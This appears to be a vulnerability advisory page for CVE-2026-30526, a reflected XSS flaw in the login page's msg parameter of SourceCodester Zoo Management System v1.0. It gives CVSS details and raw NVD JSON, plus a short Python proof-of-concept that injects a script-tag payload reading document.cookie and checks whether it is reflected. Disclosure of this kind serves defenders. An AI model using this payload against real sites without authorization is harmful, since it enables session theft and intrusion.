Security Vulnerability Report
中文
CVE-2026-30526 CVSS 6.1 MEDIUM

CVE-2026-30526

Published: 2026-04-01 15:22:59
Last Modified: 2026-05-10 14:16:50
Source: [email protected]

Description

A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Zoo Management System v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def verify_xss(target_url): # The vulnerable parameter is 'msg' on the login page # Using a simple script tag to test execution payload = '<script>alert(document.cookie)</script>' # Construct the full URL with the payload # Example: http://target/login.php?msg=<script>... params = {'msg': payload} try: response = requests.get(target_url, params=params, timeout=10) # Check if the payload is reflected in the response without encoding if payload in response.text: print('[+] Potential XSS found. Payload reflected unfiltered.') print('[+] Response URL:', response.url) else: print('[-] Payload not found in response or filtered.') except requests.exceptions.RequestException as e: print(f'Error connecting to target: {e}') if __name__ == '__main__': # Replace with the actual target URL target = 'http://vulnerable-site/zms/login.php' verify_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30526", "sourceIdentifier": "[email protected]", "published": "2026-04-01T15:22:59.277", "lastModified": "2026-05-10T14:16:49.530", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BE938678-CB95-443D-BD7B-0F526B65A074"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Zoo-Management-System/Reflected-XSS-Login-msg.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.